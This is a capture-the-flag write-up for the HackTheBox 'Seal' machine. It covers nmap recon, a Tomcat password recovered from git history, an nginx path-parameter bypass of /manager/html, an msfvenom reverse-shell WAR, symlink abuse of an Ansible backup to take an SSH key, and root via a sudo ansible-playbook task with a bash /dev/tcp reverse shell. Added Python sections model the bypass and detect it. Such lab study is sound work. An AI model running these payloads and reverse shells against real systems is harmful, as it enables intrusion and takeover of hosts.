Seal HackTheBox
Recon
nmap -sC -sV -oA nmap 10.10.10.250
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-02 08:33 CEST
Nmap scan report for 10.10.10.250
Host is up (0.023s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
| 256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_ 256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after: 2022-05-05T10:24:03
| tls-nextprotoneg:
|_ http/1.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 401 Unauthorized
| Date: Fri, 02 Sep 2022 06:32:57 GMT
| Set-Cookie: JSESSIONID=node01j0kvq70qbpqj11e6pkvdnh6s32.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Content-Length: 0
| GetRequest:
| HTTP/1.1 401 Unauthorized
| Date: Fri, 02 Sep 2022 06:32:56 GMT
| Set-Cookie: JSESSIONID=node05fxtqecve3hh15vos2gljmegx0.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Content-Length: 0
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Fri, 02 Sep 2022 06:32:57 GMT
| Set-Cookie: JSESSIONID=node0sh26ekxv2537kx25ph8zd1m1.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Allow: GET,HEAD,POST,OPTIONS
| Content-Length: 0
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| Socks4:
| HTTP/1.1 400 Illegal character CNTL=0x4
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
| Socks5:
| HTTP/1.1 400 Illegal character CNTL=0x5
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.32 seconds
Interpretation
There are three open ports: 22, 443 and 8080.
Port 443
The website on port 443 does not appear to be vulnerable. There are two input fields, but basic XSS and SQLi testing reveals nothing interesting.
Port 8080
The application on port 8080 is GitBucket. Basic or default credentials do not work for logging in, so creating a new account seems to be the way to go. We then have access to two repositories. In the tomcat folder, the tomcat-users.xml contains no user entry, but the git history reveals a deleted tomcat user with the credentials tomcat:42MrHBf*z8{Z%. This password can be reused for the GitBucket service as user luis, but this has no further impact. Looking around further reveals that an nginx reverse proxy is running which blocks requests to, for example, /manager/html.
Path traversal
This combination of Tomcat and nginx is frequently vulnerable to a path traversal attack, as explained here. 10.10.10.250/manager;name=dennis/html/ did the trick, because /manager;name=dennis/html does not match the pattern /manager/html checked by nginx, so nginx forwards the request to Tomcat. The application server normalizes the request and discards the ;name=dennis part, so Tomcat sees only /manager/html. The previously found credentials work for the manager site, so we have access to the admin panel.
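As an added illustration (not from the original writeup), the following Python models the mismatch described above: a proxy that prefix-matches the raw path versus a servlet container that strips ;param segments before routing, together with a hardened check and a scan over constructed access-log lines. The blocked prefix, the log lines and the function names are assumptions.

```python
# Added example, not part of the original writeup: a constructed model of why an
# nginx prefix rule and Tomcat's path handling disagree, plus a log check on it.
import re
from urllib.parse import unquote

BLOCKED_PREFIXES = ("/manager/html",)  # paths the proxy is meant to block


def proxy_match(path: str) -> bool:
    """Plain prefix match on the raw request path, the way a
    `location /manager/html` rule sees it: ';param' segments are not
    stripped before matching."""
    return any(path.startswith(p) for p in BLOCKED_PREFIXES)


def servlet_normalize(path: str) -> str:
    """Servlet containers decode the path and drop ';param=value' from each
    segment before routing, so '/manager;name=x/html' routes like '/manager/html'."""
    return "/".join(re.sub(r";.*", "", seg) for seg in unquote(path).split("/"))


def proxy_bypass(path: str) -> bool:
    """True when the raw path slips past the proxy rule but the backend
    would still route it to a blocked resource."""
    return not proxy_match(path) and proxy_match(servlet_normalize(path))


def hardened_match(path: str) -> bool:
    """Mitigation: normalize the path the same way the backend does before
    matching, and refuse path parameters outright so both layers agree."""
    return ";" in path or proxy_match(servlet_normalize(path))


def flag_access_log(lines: list[str]) -> list[str]:
    """Detection: return request paths from common-log-format lines that
    only reach a blocked resource through the normalization mismatch."""
    flagged = []
    for line in lines:
        m = re.search(r'"(?:GET|POST|HEAD|OPTIONS) (\S+) HTTP/', line)
        if m and proxy_bypass(m.group(1)):
            flagged.append(m.group(1))
    return flagged


# Constructed sample log lines (not taken from the target).
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Sep/2022:08:40:01 +0200] "GET /manager/html HTTP/1.1" 403 0',
    '10.0.0.5 - - [02/Sep/2022:08:40:09 +0200] "GET /manager;name=dennis/html/ HTTP/1.1" 200 512',
    '10.0.0.5 - - [02/Sep/2022:08:40:15 +0200] "GET /index.html HTTP/1.1" 200 2048',
]
```

Running flag_access_log over a real proxy log surfaces exactly the requests that reached a blocked backend path only because the two layers normalized differently.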
Exploit
Create a payload that we can upload to Tomcat.
msfvenom -p java/shell_reverse_tcp lhost=10.10.14.4 lport=4242 -f war -o rev.war
Upload the WAR file via the admin panel and deploy it to Tomcat.
Notes on deploying to Tomcat
- Logically, the request has to be intercepted with Burp Suite because the deploy button links to /manager/html/upload..., which is blocked by nginx. So the path traversal has to be applied again.
- I had to add the host name to my /etc/hosts file, but I don't know why.
Luis Shell
From the tomcat user we have to get a shell as luis. Looking around, we find an Ansible playbook under /opt/backups/playbook that creates backups of /var/lib/tomcat9/webapps/ROOT/admin/dashboard. Luckily, the uploads directory there is writable by everybody. We symlink the home directory of luis into that directory, so the next time a backup is created the home directory is included as well.
ln -s /home/luis/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
tar zxf backup-2021-09-04-07\:59\:32.gz --force-local
cd luis/.ssh
We can take the id_rsa file of luis and connect via SSH with his private key. Don't forget to set the right permissions on the key file: chmod 600 key.luis
ssh -i key.luis luis@seal.htb
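An added example (not part of the original writeup or the box's playbook) that reproduces the backup behaviour in a temporary directory: an archive job that follows symlinks pulls a symlinked "home" into the backup, while a defender-side check lists symlinks that resolve outside the backup root. The directory layout and the placeholder key content are constructed.

```python
# Added example, not from the original writeup: simulate a backup job that follows
# symlinks, and a guard that lists symlinks escaping the backup root.
import os
import tarfile
import tempfile


def archive_members(root: str, dereference: bool) -> list[str]:
    """Tar `root` as a backup job would and return the sorted member names."""
    fd, out = tempfile.mkstemp(suffix=".tar.gz")
    os.close(fd)
    with tarfile.open(out, "w:gz", dereference=dereference) as tar:
        tar.add(root, arcname="dashboard")
    with tarfile.open(out) as tar:
        names = sorted(tar.getnames())
    os.remove(out)
    return names


def escaping_symlinks(root: str) -> list[str]:
    """Defender check: symlinks under `root` whose target resolves outside it."""
    real_root = os.path.realpath(root)
    bad = []
    for dirpath, dirnames, filenames in os.walk(root):  # does not follow links
        for name in dirnames + filenames:
            p = os.path.join(dirpath, name)
            if os.path.islink(p):
                target = os.path.realpath(p)
                if os.path.commonpath([real_root, target]) != real_root:
                    bad.append(p)
    return bad


def demo() -> dict:
    """Constructed layout: a writable uploads/ dir with a symlink to a fake home."""
    base = tempfile.mkdtemp()
    home = os.path.join(base, "home_luis")
    os.makedirs(os.path.join(home, ".ssh"))
    with open(os.path.join(home, ".ssh", "id_rsa"), "w") as f:
        f.write("constructed placeholder, not a real key\n")
    dash = os.path.join(base, "dashboard")
    os.makedirs(os.path.join(dash, "uploads"))
    os.symlink(home, os.path.join(dash, "uploads", "luis"))
    return {
        "follow": archive_members(dash, dereference=True),
        "nofollow": archive_members(dash, dereference=False),
        "escaping": [os.path.relpath(p, dash) for p in escaping_symlinks(dash)],
    }
```

A backup job over a world-writable tree should either store symlinks as links (the nofollow case) or run the escaping-symlink check and refuse the run when it returns anything.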
root
To list the commands which user luis can run without a password, run sudo -l.
According to the result, (ALL) NOPASSWD: /usr/bin/ansible-playbook *, luis can run any ansible-playbook as root without a password.
Ansible commands
Looking around, I found an article which describes how to weaponize ansible-playbook and build a reverse shell with it.
- hosts: localhost
  tasks:
    - name: rev
      shell: bash -c 'bash -i >& /dev/tcp/10.10.14.18/4242 0>&1'
Run this .yml file with sudo ansible-playbook run.yml and start a listener on your machine.